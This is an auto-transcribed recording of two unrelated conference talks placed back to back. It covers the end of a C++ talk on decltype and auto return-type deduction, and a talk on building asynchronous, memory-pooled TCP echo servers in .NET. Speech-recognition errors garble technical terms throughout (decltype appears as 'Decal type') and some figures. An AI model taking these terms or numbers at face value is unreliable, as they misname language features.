that auto will deduce in this case reference to constant int because x is a type int and Decal type of rx is reference to constant. Doesn't get rid of the reference, keeps the constant. It literally spits out. Spits out. It's a compile time analysis, right? It's not a runtime thing. But it literally will give you exactly how the variable is declared. So that's Decal type of a name. Now, there's another rule. I'm only going to talk about two rules. Here's the other one. If I have Decal type of an L value expression that has a type t, so if I say Decal type of an L value, it's an expression, then the resulting type is going to be the type t and it's going to add an L value reference to it. So if I have a function findVec which returns an L value reference to a constant standard vector of widget, actually let me back up for a moment. The rule is that if you have an L value expression of type t, Decal type will return to you t reference. Now at first glance, this sounds like it's adding a reference to a type which doesn't have one. But that's usually not the case. It turns out that most expressions that are L values other than names, which we've already talked about, most expressions that are L values other than names actually do have an L value reference in their type. So usually nothing's being added. So here's a function findVec it returns an L value reference to a constant standard vector of widget. Notice that it's returning already an L value reference. That's what makes it an L value expression. If it didn't have the reference, there would be an R value expression. So normally no reference is being added and just for what it's worth, there are some very obscure situations which are not going to affect anybody in this room unless you are writing compilers for fun. And under those weird conditions, sometimes the L value reference gets added. It turns out that because of C, if I have a built-in array and I use the array bracket operator on the built-in array, this is only for built-in arrays. The language specification says the result is an L value of type t. It doesn't say it's a reference to a t. It says it's an L value of type t. Basically it's not a reference. As a result, if I do decal type of array sub zero, it actually will return int ref because that's what it acts like. And I'm now going to skip over that because really unless you are writing compilers for a living, you will never care. There are a lot more rules for decal type. I will be honest, I don't even know what they are. I know that they exist. I can look them up when I have to. But these two rules suffice for developers doing anything even remotely normal. I want to point out a name is an L value. So if I say int x, x has a name, I can take its address. X is an L value. Variables are L values. So now we have these two rules in decal type. The first rule says decal type of a name just spits back its declared type. The second rule says decal type of an L value spits back the type adding an L value reference. These two things are a little bit in conflict. But the decal type name rule beats the decal type expression rule. So if I say decal type of x, well x is a name, it's declared to be an int, so the result is int. But if I say decal type of open paren x, close paren, that's an expression. Open paren x, close paren is not a name. It's an expression. And that means the resulting type is int ref. Now at this point you don't care because it's obscure information, but it's late in the day and really, you know, parentheses, no parentheses, what's the point? In C++11 we had a limited kind of function return type deduction. In particular, single statement lambdas, you could deduce the return type. The compiler would deduce the return type. Well C++14 said, you know, this is a cool idea. So rather than limiting return type deduction to single statement lambdas, let's make it available to every function, no matter how complicated, as long as the type can be deduced. So all lambdas plus all functions now get return type deduction if you ask for it, which means you better understand how that works. So there are two kinds of deduced return type specifications. The first thing is if you say the return type is auto, you get template type deduction rules. You don't get auto type deduction rules, that'd be too easy. Just remember auto means template, unless it's for an object in which case it means auto. It just means that there's no type that is for brace initializers. If you say decal type auto, decal type auto means use the decal type deduction rules. So we're not actually adding any new rules here, just two new contexts. Now sometimes you actually want auto as an example, as an example, as a function lookup value. So what lookup value is going to do is it's going to look up a value and return the value to the caller. That's what it's supposed to do. So here's lookup value, it gets some context information as parameters, and what it does is it declares a static vector called values, which is somehow initialized inside this code. So I've got a vector inside the function, and then what I do is I compute the index into the values, so I find the appropriate entry in that array, and then I say I want to return values sub IDX. Now in this case here, I really want to return an int. Because I don't want to make it plus, if this thing returned a reference to an int, I would actually be returning a reference into the static array inside my function. I don't want to give callers access to the static array. I want to give them a copy of the int in that static array. I don't want to let them do this. I want this to not compile. Lookup value with context info gets zero. If this thing here returned a reference, this would compile and this would modify the values in the vector inside the function. So for this code to do the right thing, for an int, I really want this to be just an int. I don't want it to be a reference to an int. So this is an example of a context where returning a value is the correct thing. On the other hand, let's suppose I have a function called authorize and index, where what authorize and index does is you pass in some vector and an index, and what it does is it authorizes the user to make sure they actually have the right to do this operation. And then what it does is it returns v sub idx. It does a normal indexing operation. Now here I really do want people to be able to modify the contents of the vector. Look, they passed in the vector. They clearly have access to it, which means that somebody should be able to say authorize and index with their own vector and the index 10, and after authorization it should then assign 10 to, excuse me, assign 0 to that location. Under these conditions, we really want a decal type auto return type, because we want to return a reference into that array. Auto would be wrong here. So there are legitimate uses for an auto return type and a decal type auto return type. But it does have some interesting quirks. So here's lookup value. So let's suppose I have lookup value and it does decal type auto return type, which is suspicious because we could have just used auto, but let's look at the function implementation. So the function implementation, here we have a static vector of values. We lookup the return value and then we return a copy of the return value. Now in this case here, values is a vector of int, so it's contents or integers. So I lookup values sub idx, that's going to be an int, which is the return value is therefore of type int. So now I am returning return value. Now return value is a variable. It's just the name, because it's a name, decal type deduction rules will simply deduce the type int. It won't add an l value reference to it. So this code will work fine. It actually is returning a value, not a reference. Some people are of the habit of parenthesizing their return values. It's just something they do. So if I take this implementation and suddenly put parentheses around this return value, now this is no longer a name, this is an expression, which means decal type auto will slap a reference on it, which means what this is returning is a reference to an int, and in particular it's returning a reference to this particular local stack variable, which by the way is not illegal. It's just stupid. So this is legal code. With any luck you will get a warning that you are returning a reference to a local variable. But slight differences in the way that you write these things makes a difference. So something to be aware of. The rule of thumb that I think is worth bearing in mind is you want to use auto if a reference type would never be correct. And I'm talking about auto by itself. Because you could return a constant auto ref that would work too. And use decal type auto only if a reference type could be correct. Returning decal type auto does not guarantee you will get a reference. You might not. But it's important to understand that auto uses template type deduction rules. Decal type auto uses decal type deduction rules. And if you're looking for more information on this whole business of type deduction, you can read about in these three things here. We have a couple of minutes, so I will ask are there any questions about anything to do with type deduction? Yeah? So if you wanted to return an L value reference, it would be better to use auto reference instead of decal type auto. Because it's more readable. Okay, so the question is if I wanted to return an L value reference, should I use auto ref as opposed to decal type auto? If you know for certain that you definitely want to return a reference, then I would use auto ref. Because decal type auto doesn't guarantee it will return a reference. It depends on what the expression is that's being returned. So if you know for a fact that you really want to return a reference, then yeah, you do auto ref. Decal type auto can be useful in situations where you are calling some function which is overloaded. Some of the overloads return a value, some of the overloads return a reference. Which can happen with the array bracket operator, and I talked this morning about proxy classes. So if, for example, if you were indexing into a vector and you want to return whatever you get back, if it's a vector of bool, you want to return a value. If it's a vector of anything else, you want to return a reference. Decal type auto is perfect for that. But if you know you always want to return an L value reference, I would go with auto, auto ref. Any other questions? All right. Well thank you very much. And for both for me and for the conference, please pick up the appropriate color piece of paper and throw it in the bin on your way out. Thanks very much. Thank you.
C++98 had template type deduction, and it worked so intuitively, there was little need to understand what took place under the covers. C++11 extends type deduction to include universal references, applies it to auto variables and lambda expressions, then throws in a special auto-only deduction rule. C++14 pushes the boundary further, adding function return type deduction to arbitrary functions and offering auto parameters for lambdas. The result is that what could be treated as a black box in C++98 has become a topic that practicing C++ developers really need to understand. This talk will give you the information you need to do that.
10.5446/50605 (DOI)
So, I guess we may as well start. Hi everyone. My name is James Nugent. I work for a company called Event Store. I'm actually quite surprised and impressed with the turnout for a talk that's up against Scott Hanselman and Drs. Croftford and James Newton King. So, thank you for coming. So, what we're going to be talking about, so the title of this talk is TCP servers done right. What I'm going to qualify that with is for some definition of right. We're going to be looking at.NET code. We're not going to get it up to the performance that you could conceivably get out of native code, mostly because I am not convinced that's possible, but specifically we're going to be looking at stuff that works well on Windows and I'll point you towards some stuff that works well on Mono as well. And secondly, we're going to spend most of the time looking at async TCP, which may or may not be the best choice for you. There's a debate going on, or there's been going on for quite a while. It's basically settled, I think, about whether blocking calls with sort of a request per client, sorry, with a thread per client, or asynchronous IO is the best way of dealing with things. And it turns out that if you want the best performance for one client and you have a relatively small number, you may actually be better off with the request with the thread per client. I'm not going to show an example of that, but it's a fairly trivial extension to one of the examples we will look at. If people are interested in the code that we look through, then I can stick that up on GitHub. And the big thing we're going to look at at the end is open source anyway, and that's already on GitHub, so I can point you towards that. So basically what we're going to go through is refactoring the same code, basically, to from being a basic synchronous server which will only deal with probably one client at a time, and then taking it through, making it deal with multiple clients, and then looking through the memory implications of what we're doing, and considering how that will scale up to multiple clients, or lots of clients very well. And then we'll try and wrap things up in a slightly nicer abstraction for the purposes that we need. And then we're going to skip away from sample code and go and look through some actual real life code of stuff that's in a database server capable of doing 60,000, 70,000 transactions a second over TCP, which is the event store. This is going to be very code heavy, so in fact I'm going to lose the slides for now and switch to code. Actually, there's one more. So the basic abstraction in.NET for all this stuff is the socket class. It covers most of what we need. There are various people who've tried to wrap native things like Libby, V, etc. in managed code and call it directly. They've had variable results. It seems that there is some mileage in that, but we're not going to really look at that today. We're going to stick with the native.NET stuff, which you can get to a reasonable throughput if that's what you need. So let's switch over to code because that's more fun. The first example I have here is just a program is just calling this server class and running it on the main thread. All we're going to do is use the socket class. We're going to bind to this endpoint, so we're going to bind to 127001 on port 11000. We're going to bind for IP and we're going to use the stream socket. There are various other types here, so we could go and use, for example, we could go and use datagrams and that kind of thing, but we're going to stick to stream stuff for all of our demos today. We're going to use raw TCP. So running synchronously with these two methods, bind is going to set up the socket and to bind to the given endpoint that we've defined up here. Then listen is going to start listening for connections. Then a little bit of error handling. We'll talk more about error handling later on. Then we're going to go into this main loop which is going to keep running until we terminate the server. All that's going to do is accept a connection. So there's a difference between listening for a connection and then when one appears we need to accept it to get a hold of a socket that we can talk to. At that point what we're going to start doing is listening for data that the client sends and immediately sending it back to them. This is going to be a pretty horrible echo server because it's going to do things literally as we type. Then we're eventually going to close the client socket if they send nothing. If we run this for a few minutes we can see what some of the characteristics are. I'm going to use telnet as the client for all of this stuff because it's nice and straightforward. If we start a session then we can see we're handling this client at the moment so we're somewhere here in the code. If we start typing away, hello world, then we start to see that our output, exactly what we type is being echoed back to us which is kind of what we'd expect. If we fire up a second one of these then as we're probably expecting, nothing's going to happen. We're not going to see we're handling another client and if we type in here nothing's going to happen. In fact if we're going to terminate this client, so if we use what is it, control, write bracket and then queue, we will actually see that this one is eventually connected because it's sat in a queue. The telnet client is going to buffer all the input that we've given and it's going to send it across when it finally does connect which is nice. We get back our whatever random stuff that I typed into that box. We can see that this is fundamentally one client at a time which might be occasionally what you want. If you're doing thread per client then that's basically exactly what we want and this is the exact model you'd use for that. Spawning up a new thread on every accept. But as it is at the moment we can only really handle one client at a time and everything's being done on our main thread which is probably less than ideal. In order to get around that, I need to control C out of it to get rid of it. To get around that we need to start somewhere up here. As with most methods on this class, there are two different variants of it. There's accept and there's also accept async. Accept async is going to take, in fact let me open up the project that's got that in. I decided that live coding this stuff was a very bad idea. Most of the examples can. What I've done here is just split it out into, oh it's still in the same kind of thing. When we listen, after that we're going to start accepting for some number of concurrent accepts. That's just a constant that's defined up here. I think we're on one at the moment. You can make it any number that you like. There's a trade off between how long your queue is and whether you want clients to wait for a long time or disconnect. But when we start accepting, what we're going to do is create this class which gets given as a parameter to the accept async. One of the things that defines is, you know, it has various things that we can define on here. One of the things that it defines is this completed event handler. What that's going to do is call our delegate when we get a client connect. What we're going to do here is just hook it up to something that's going to handle it, which we'll look at in a second. Then because it's an async call, it's possible that it will return immediately. For example, if our queue is backed up of clients trying to connect, the chances are this is going to return immediately and we'll never get the async fired because that's how the pattern works. If we don't fire async, then we're just going to call that synchronously. It also could be the case that a client opens a connection and then disconnects before we have time to service it, in which case we can get, there's various conditions that can lead to these object-disposed exceptions. There's not really much you can do about it if this throws when we try and close the socket down. In this case, I've just got a little helper method called eat, which will ignore that without having to appease, resharper or try and use an empty catch. When we get a connection, what we're going to do is close it immediately, basically. We're going to see if it was successful, except, then we're just going to log the fact that we accepted it and then we're going to close down the server and we're going to look at where the connection came from as well. Then what we're going to do is start accepting again immediately. This is what will cause the thing to loop and continue to allow us to service clients. If we run this, it will be the world's most irritating server because you'll connect to it and then it'll immediately disconnect. I occasionally suspect that that's how they implemented iMessage, by the way. If we do this, then we'll see, you know, telnet1270011000. What we should see is that we started processing and accept from this and then we immediately closed it. What's this? This is one of the ports that gets used for accepting client connections. You can configure the range of ports which will be used to service client connections and, in fact, how many ports are available for that which determines, in part, how many concurrent clients you can deal with. You can do that. There's Windows settings for doing that, which.net will, as far as I'm aware, will obey. We immediately closed the thing anyway. The telnet clients detected that and it's just shut itself down. If we could keep it open for long enough, we should be able to, if I hadn't blocked the server by highlighting it, then we should be able to keep doing that. If we were staying open for long enough, we should actually be able to have multiple clients connect to this because we're doing it. We're not blocking the thread as it's waiting to receive. That leads us to a few things here. The first is if you imagine that we were expecting quite a few of these, quite a few clients to be accepting, then it would be pretty poor to be allocating these things every time that we, yeah, every time we want to accept a new client, we have to allocate one of these on the heap. As far as I'm aware, that's a class. Maybe it's dropped. I don't think it is. It's a class. Goodbye, reshuffle. We probably don't want to be doing that. One of the common patterns that we're going to see here is the need to do some manual memory management. Who here works with.NET all the time? Who remembers being told when.NET came out that garbage collection meant that you don't have to deal with memory yourself ever and you don't have to do it right? That's the most dangerous thing ever. The all the normal memory management patterns still apply. It's just that you don't have to keep track of things yourself all the time. It turns out if you're into this kind of stuff and in particular if you're doing a lot of native calls, then actually you do have to worry about this stuff. I'm going to pull up the next thing here, which has a slightly different version of that. What we've introduced here is the idea of a pool. What that's going to do is determine some number of these objects that we think we're going to need over time. It's going to allocate a whole load of them in advance. Then it's going to make them available via a pair of methods. One is get, which you use when you want to get one of them. The other one is return, which you call when you're done with it. In other words, you say, I want to use this object temporarily and then you use it for the duration of the period that you need and then you return it to the pool and somebody else can use it. It's implemented in a fairly straightforward manner. They're sitting on a concurrent stack, which is if you look into the memory usage profiles, a concurrent stack is marginally better than a concurrent queue for it just because you tend to reuse the same ones more often. When we create the pool, what we're going to do is go through and just create a whole load of them. We're actually not going to create them directly in here. We're going to allow the consumer of this class to pass in a funk, which will determine how the objects get created, which we'll see is going to be useful in a second. Then when you get one, you pop the last one off the stack and when you return it, you push it back on. It's a fairly straightforward class. If you're using Mono, this is one of the areas where you need to pay a bit of attention because the concurrent stack is not very concurrent. This may be fixed now, but certainly as of 3.28, I think it was, it was still not very good. I can post some ways of getting around that that we're using in the event store. So what we can see if we go back to our server is when we start up, we're going to create one of these pools. The initial number that we're going to use is basically the number of concurrent accepts, the number of concurrent accepts we're going to allow times two on the basis that that way there should always be enough on the stack. Even if everyone was taken by an accept that's running, by the time we want another one, there should always be one there because it will be returned pretty quickly. The funk we're going to use, it's actually a method rather than a funk, but what we're going to do is hook in our own delegate into this completed event. Other than that, the code is pretty much the same. We've just factored out the exception handling code. It's very important to make sure that we actually return the thing to the pool. So even in the case of errors, we really want these objects to get returned to the pool and not lost in the depths of time. So whether we're successful or whether we are in an error condition, we need to make sure that we haven't left any of our own data in these objects which are going to be reused and we need to return them to the pool. So in this particular case, when we use accept async, that's going to set the accept socket so that we can do further work with it. Now when we return this to the pool, we don't really want it with somebody else's accept socket on it because apart from anything else, it means that will never get garbage collected. So we need to be very careful to set that to null wherever we return these things to a pool. Apart from that, we've changed the server a bit so that it doesn't just disconnect because that was really annoying. So what we've done instead is in our little server, when we construct this thing, we're going to, when we start listening, sorry, we're going to take an action which is what should we do when the socket gets accepted. And just for convenience sake, we're going to return, we're going to give the action both the remote socket so that we have some easy way of identifying it just temporarily. And we're also going to give it the actual socket object itself so that it can make calls down to it. So if we go back to our program, which is the eventual consumer of this class, what we're going to see is that we, I'm running a background thread just so that I can exit it more easily. We're going to create this, we're going to create the server and when we start, we're going to pass it this handle connection delegate. And for now, all that's going to do is, well, it's not going to do anything, it's just going to sit there with the connection open. And this should prove to us that we're actually capable of accepting multiple clients at the same time. So if we run this, then, oh, tell me, I don't know why these come up so big. So we're going to sit there, we can see we've got one client that's been accepted from that ephemeral IP address, ephemeral port. And we can probably go ahead and start another one and if I'm not mistaken, it should connect. So we're capable of now handling multiple connections at the same time, which is an improvement on our synchronous version. And we're also not, we're not causing horrific memory problems yet. So there's actually, there's an interesting tip that if you ever get hit by it, the chances of you ever getting hit by it are fairly minimal. If you are, it will troll you for an entire week. It's entirely possible that if you're making lots of connections and breaking them again in a very fast cycle, you can see it on the state chart that you can end up connecting to your own TCP port, which will connect and it will look okay and nothing will work. We literally spent about a week looking for this in the events. It was one of the worst trolls we've had in the entire development process. But anyway, so we've got multiple connections. So if we go through and break some of those, now we can access our server properly as well. So let's go make it do something a bit more useful than this. Fortunately, because we've got the socket, we can start to use something like client, sorry, not client endpoint, we can start to use client socket. And then, okay, so what do we do? So there are a few options here. Basically what we want to do is when a client starts, we want to start listening for data because they're, you know, the whole point of an Echo server is they're going to send us something, we're going to send it back. I'm going to use Echo all the way until the end of this talk because it's a nice easy protocol that everybody understands. So we have a few options here. We have receive, which is fine. That's going to block though, so we don't really want to use that because we're still running single thread here, remember. We've got receive async, which is going to take one of the socket event objects again. And that's a valid option, but that's using the asynchronous pattern from.NET. I think that was introduced with.NET 2 or something like that. Instead, what we're going to look at is begin receive. And this is generally a lot more useful. If we look at the signature for this, if it will stay up during my Zoom, which it won't,.begin receive, then basically what we've got to give this thing is a buffer to write into. So we're going to say to the socket, start receiving data from this client and put it here. And we're going to give it somewhere to put the data. So I'm going to not implement that here. I'm going to go on to the next one because that way I don't have to do all that. How do I do this again? What number was that? That was three. So let's look at number four. This one now has a lot more files in it. So the problem with using the begin receive thing, in fact if I go and bring it up, we can actually go and type some of that code just to see the motivation behind wrapping this up in a slightly nicer model. If we actually go and do this, we could say here that we're going to allocate a byte buffer of say, well, var buffer equals, just say new byte. And let's say we're going to give it a kilobyte buffer to write into. And then we're going to do client socket dot begin receive. And we're going to pass it a buffer. And we're going to give it an offset into a buffer. So we're going to say zero in this case. And we're going to say we're going to receive 1024 bytes with no flags. And when we're finished, we're going to have a receive completed. And we don't need any state. Actually we do need some state. We need the socket. So if we're going to generate out this method, this is just using the standard pattern that's been there since dot net 1.1 or 1. It's been there for a long time anyway, and a lot of stuff influence it. The point is when we get this, we can use, we can get our socket back via socket AR dot, yeah, dot async state. And then, you know, we could go do something with it. The problem is what we don't have is a buffer. So, you know, we could go and write a tuple here or we could go and write our own custom object to put into the state. The point is once you start implementing this pattern, you end up with writing quite a lot of code that's quite convoluted. Instead, it would be nice if we could interact with the thing using basically registering our own callbacks that are for complete messages being received over TCP. And where we could in queue sends rather than having to block waiting for them, et cetera. So this model, I've basically called some of this code out of the event store code base. The central abstraction we've got is this thing called a TCP connection. And what that represents is one client. And it has some methods that we can use. So we can use in queue send if we want to send something. Or we could do a try send if we think it might fail for some reason. And we have our own version of receive async that's going to take our own callback so that we don't have to bother passing around these buffers. Internally, that's exactly what it's going to do. But let's see how we use this thing. I'm not going to go into the implementation details of that. It's actually a lot more complicated than it needs to be for our simple purposes here because it does a lot of monitoring on the connection. So it will track, for example, the total number of bytes written and read to and from a connection. And it will monitor various other aspects of it that we needed for other things. And pulling out that code was just too painful. So I left it in. But if we go and look at how our server actually uses this, what we can do is write these nice callbacks instead. We can say once our connection has been accepted, which is exactly what was happening before, we're going to create a little abstraction over this client. And we're going to give it an identifier so that we can get back to it easily later on. And we're going to give it the endpoint and we're going to give it the socket. And we're going to use for both logging for now so that we can see what's going on underneath. And at that point, when we do receive a sync, we're calling receive a sync on our abstraction rather than on the actual socket, which is a bit of a clumsy API. So what we're going to be able to do is say, is this. So when we receive data, we're going to get back an innumerable of array segment. Who's seen the array segment class before? Sorry, the array segment struct before. Okay, cool. So the array segment struct is basically a fly weight over an array or well, actually over an array. It's a way of passing around a reference to it, which you can iterate over or you can, let's go look at it. It's basically a way of allowing you to iterate over the contents of an array or over a part of an array and treat the whole thing as, treat the whole thing as if you had an actual slice of an array, if you like. So because we want to be nice and efficient underneath, we're going to be writing into a pre-allocated array which we'll look at in a second. So we're going to get some data back which is going to be a reference to, you know, we don't know where it is. It's not in a buffer that we've allocated anymore. And all we're going to do is send it back and start receiving again. This is basically the pattern of most servers, right? They're going to wait for data, they're going to wait for a request, they're going to process a request, they're going to send a response back. That's the case for most protocols. The protocol that we're going to look at right at the end is actually not like that, it's fully asynchronous. So it resends responses out of order with correlation IDs on them instead. But now we're back to our, basically back to our Echo server. And we've added this extra thing which will hook up a connection close thing and just log when the client drops. So if we go look at this and run it for a second, we should be able to get a client up. And we should be back where we were with our synchronous port number. We should be back where we were. So now if we type, you know, we should be getting a test thing, you know, we should be getting our data back at us. And then if we close, we should, oh, how do you even close? Thank you. Then we should see some information about our socket. So we've been monitoring various things about it, like the number of send calls. This can be useful during debugging. So how does that help us? Well, one of the things that we need to be very careful of, I'm going to go back to slides very briefly and this is the last time, I promise. One of the things we need to be really careful for is heap fragmentation. We called a lot of begin send, begin receives, sorry. Now begin receive is an interesting thing because we have to pass it a buffer. And when we started this, we were allocating our own buffers, right? We were saying here's a new byte array that we're going to declare and it's going to be allocated on the heap and we're going to pass it to this method. And we were passing relatively small buffers, you know, they were 1,024k. So they're probably going to be in generation zero or in the nursery if you're on the monogarbage collector. So the problem with that is, if we go and look at our heap for a second, let's imagine we have a whole load of objects. And the red ones have been passed to a begin receive call. Oh, I'm using the terms from the monogarbage collector there rather than the.NET one, but yeah, same principle. The problem is begin receive is basically a wrap around a native call, right? It's going to do some interop and the actual network stack is going to have to be writing into this memory. So what happens is the garbage collector pins that memory which says basically you're not allowed to move this when you do the garbage collection. Who's heard of the concept of pinning memory before? Okay, cool. So the problem is if you've got pinned memory, then you can end up with really badly fragmented memory. If you imagine that we go through all these other objects which are gray are basically free to be collected, then when we go through our next garbage collection cycle, our heap is going to look like this. Now what happens when we want to allocate an object of this size? It won't fit in any of those gaps. There's plenty of free space for it, but there's no continuous space big enough for this object to fit because we've got a load of things that we're not allowed to move because the operating system is expecting them to be in a certain place. Unfortunately, we're not allowed to do this and just squeeze some memory into a box that's just about the right size. So how can we deal with that? Basically, the abstraction that we want to use is very similar to the socket event args pool that we looked at earlier. What we want to do is pre-allocate a whole load of buffers that we can use and we can distribute out amongst calls. Ideally, we want to be allocating a lot of memory because if we do that, it'll end up on the large object heap where it's less likely to cause us problems with transient objects. So let's go and look at the implementation of that. We have this thing called Buffer Manager and what that's going to do when I get down to the meat of it is go through allocating chunks of memory and they're going to be chunks that are on the large object heap. So it's basically going to declare byte arrays big enough, so bigger than 73 kilobytes on the CLR, big enough to be stuck in the large object heap. Then it's going to chunk that up into, well, it's going to create an array segment over this which is big enough to be useful. Basically, when we do these begin receive calls, we basically always want the same buffer size. We're going to decide what a useful size for our particular use cases are and we're going to start, you could do it slightly differently so that you can have variable size buffers as well, but for the most part, we're going to want fixed size buffers. We're going to stick them again onto a stack so that we end up reusing them. In this particular case, this implementation of it also allows it to allocate further memory if necessary, so if we're doing so many calls that we've run out of the initial amount that we allocated, then we can allocate new slabs further down the heap. But this array segment thing allows us to transparently give out slices of the big pool of memory we've allocated to all these begin receive calls. So now when they pin it, it doesn't matter. We're not going to get heap fragmentation as a result of that. Unfortunately, it's quite a pain to, you know, it's another motivation for having this TCP connection abstraction is it's quite a pain to go through and make sure you return all the buffers when you're finished with them. Quite often, you're going to be holding onto them for a while until you've got enough to satisfy what you're actually listening for. When you go through implementing protocols, for example, the AMQP protocol is sent on the wire with frames which are delimited by, you know, you send the length of the frame and then you send the actual data. And you wait until you've got a whole message before you start processing the message further downstream. So this is quite a useful place to start buffering that. So if we go and look at one of the protocols a little bit like that, where are we? I think this is the last one of these I have. What we're going to do is make our Echo server a little bit more user friendly to people typing into Telnet. And rather than sending back every character, what we're going to do is use a horrible protocol which is really open to denial of service attacks. And we're going to wait for new lines in our data before we send it back. The reason that that's a horrible protocol is because it's unbounded as the amount of time we're going to wait before we send anything back, meaning a particularly malicious client could just send us a load of data and fill it up. So what we have instead, what we're going to do, we have this interface called a message frame. And what that's going to be doing is responsible for looking into the data we've received through our calls and deciding when we've got a message that's complete enough to send it onto the processing part of our application. And that particular implementation of this, what have I called it? I've even called it crappy temporary framework. So what that's going to do is try and pass every segment as it comes in. I'll look at where it's hooked up in a second. But basically we're going to copy all the data into our own array. This isn't going to be, this one isn't going to be pinned, so it's not such a problem we're allocating it. It might still be better to not do that for other performance reasons. And then we're going to assume that we have a string and we're going to see whether it's got a new line in it. And if it has, we're going to call the handler that we've registered with this class to say, here's a message that we've got, this is good enough that our application downstream is going to start processing this instead of keeping it internal to the TCP transport. And I haven't implemented frame in this case. So our call back is just a, here's all the data, go do what you want with it. If you're implementing a protocol that has a known wire format, maybe you probably have some kind of thing that's capable of deserializing the messages or translating the message into some internal structure that the rest of your program can deal with. So let's look at where this is hooked up. It's actually in our basic Echo server class again. Where are we? It's in this on data received. The first time that we get some data on a connection, what we're going to do is decide whether we've already seen data for that connection before. This is a really good reason why we gave the connection an ID earlier. We need to be able to track if we're going to sort of do this, if we're going to do this asynchronous sort of re-entrant type stuff where we're not guaranteed we're going to get a whole message in one call back because apart from anything else, we're only receiving 1,000 bytes, 1,024 bytes at a time. It could be over many calls. We need some way of correlating the messages together by socket. So by giving the connection an ID, we've managed to, you know, we've come up with a key that we can use for that and that we can easily get back. So as part of our little protocol here, we're going to, as part of our little protocol implementation, we're going to have a concurrent dictionary of GUID, which is what our connection ID was, and then we're going to link back to the actual connection and we're going to link back to the current framework, which is going to be responsible for storing the state of the messages being sent over that particular socket at the moment or that have been received over that particular socket at the moment. So when we actually get some data, we need to, you know, we can go and look up in that dictionary whether or not we already have a framework for it, and if we haven't, we're just going to register a new one. Now, I have stuck a nasty little hack in here because our Echo protocol doesn't actually have any kind of way of correlating back to a client because we're just receiving ASCII over it or UTF-A or whatever we're sending over actually. So I've chosen to make it that whenever we start a new one, we just serialize that little client ID back into the message so that the downstream provider can get it when they need to. Otherwise, all we're going to do is, you know, just go through and unframe the data every time we get it, which in our case was going through looking for new lines and deciding whether or not we've got a good enough message that we can pass it on downstream, and then carry it, go back to receiving so that we can get more if we need to. So when we get a complete one, this callback will be called by the message frame. And what that's going to do in our particular case, we know we can get the connection ID back. All we're going to get is the data. We're not going to get some kind of tuple of the data in the connection, although we could do that as well. It's just a bit harder to go through and implement. So when we've got a complete message, we can go and get the socket back and then just in queue the data, we can go and in queue a send of whatever we were sent in the first place. And then our abstraction in the background will go and send that over the socket and make sure that everything's good there. So if we run this version of it, we should now be able to deal with multiple clients. So if I do telnet12701, 11000, then we should be able to type and we won't necessarily see anything at the moment because it's not actually echoing yet. But if we press enter, we should get our text back. Now we see it. I don't know why the Microsoft telnet client does that, but apparently it does. And again, and we should be able to deal with multiple clients. So how about this one? Yep. And our messages end up being correlated back to the right connection because of that little lookup dictionary we had. And if we quit, we'll see the same stats about each connection. So we've gone from having something that's entirely blocking, only dealing with one client at a time and doing horrible things to our memory to being able to deal with multiple clients without doing anything nasty to our memory profile. All still single threaded, right? We're still running, all of this is still running on one thread. So let's go and look at an actual protocol, an actual use of this sort of stack. And then I'm going to go into the event store code base here. This stuff is all open source, it's all on GitHub. Oh, hold on, is that the right thing? That might not even be the right thing. Most of the classes that we were just looking at came straight out of this code base. They've been tested reasonably heavily. So in this particular case, rather than having like a basic echo service or something like that, what we have is a TCP service. And it's capable of listening to a few messages. We're messaging all around this thing internally. But it's capable of listening to a few messages which tell it when the system should be shutting down, that kind of thing. But the important thing here is when we get a connection accepted, we start up with one of these TCP connection managers, which is basically the same abstraction we had earlier. And we start receiving on it. In that particular case, our protocol, our on the wire format is very similar to the AMQP one. We send frames of messages, we're always sorry, we send delimited messages where we send the length of the message first and then we send the actual data of it. The data happens to be a serialized protobuf. Protobuf was perfectly fast enough for us and there are various, there's plenty of other alternative formats for that. So in our case, the message frame looks slightly easier. It's this length prefixed one. And what that does is exactly what we're doing earlier, but rather than looking for, rather than looking for new lines, it's looking for us to have enough data. And it's also looking for the data to be valid in some ways. So there are various, we build into the header something like, we know that the first end bytes is going to actually not be a serialized protobuf. It's going to be a message idea. It's going to be a correlation idea. It's going to be some authentication information and that kind of thing. So we deal with all that here. But then the complete thing that we deal with is actually, I don't know where is that method used. That's the easiest way of getting to it. The on message arrived callback is going to look very different. What we're going to do is package it up into this message type here, which is going to go on to, it's basically responsible for transporting all of the information about the particular message that we've just got, which we've turned into be a package. And that's going to go on to the next stage in the process which deserializes the protobufs and then sends the message on to the next processor. So it will in queue it for something else to deal with, depending on the type of the message that we see. The same thing happens in reverse for the, for sending. So there are a number of TCP send services which will, yeah, TCP send service, I think it's called, which are basically responsible for handling other applications, but for other parts of the application saying we need to send this thing over TCP, then it will deal with getting it down the right socket based on the client's ID. So this model tends to work quite well if you're trying to deal with long running clients and you're trying to deal with lots of them. It's probably not so great if you're trying to deal with lots of transient clients. So it's probably not, for example, the best way of writing an HTTP server that's supposed to deal with lots of, lots of clients. It's not bad if you're trying to build a database client and it works well for us. With that, I'm kind of out of demos. Does anybody have any questions about all this kind of stuff? Or if not, then, oh, sorry, go ahead. Okay. So the question is, if you compare it to WCF's net TCP binding, then what might be the advantages of doing this? So the first advantage is that you're not tied to the SOAP protocol, which WCF is. So it may be that, huh? Okay. So my understanding of the net TCP binding was that it would basically be dealing with you. The only advantage you're going to get from it is for it to marshal your messages for you and deal with the SOAP headers, right? Maybe I'm misunderstanding that. Okay. So if it's doing a thread per request, then what you may end up seeing is actually a lower latency per request. But the chances are you'll be able to deal with a lot fewer concurrent clients well and you'll degrade worse under high load because there'll be a whole lot of context switching between client threads. So I'm not entirely familiar with the underlying implementation of the WCF bindings. Last time I looked at it, it didn't appear to be that much use for just implementing general protocols. That may not be the case anymore. Oh, sure. If you have control over the client and the server and you want them to be communicating like that, then it may be a perfectly good choice for you. You probably have to measure it in your specific use case. I'm not familiar enough with the internals of that to be able to tell you. Are there any others? Greg? Oh, yeah. So actually one of the other things that I should go through and point out, there is a type in the event store called a buffer pool stream, which will use those preallocated chunks in an implementation of streams. So if you're doing, for example, lots of XML manipulation, so you're deserializing a large XML document, it may be useful to do that to avoid the same kind of memory issues that you see with that. Yeah. Mhm. Yeah. well, hahaha. Yeah. Yeah. Yeah. Potentially. So the array segments themselves aren't because they're structs. And I think the concurrent stack is going to use a pre-allocated. It's an array back thing, right? So that's going to, if you know the size roughly that you're after up front, then you could specify that to the stack and structuring. It should allocate enough space to not be churning too much, I guess. Cool. With that, time for a beer.
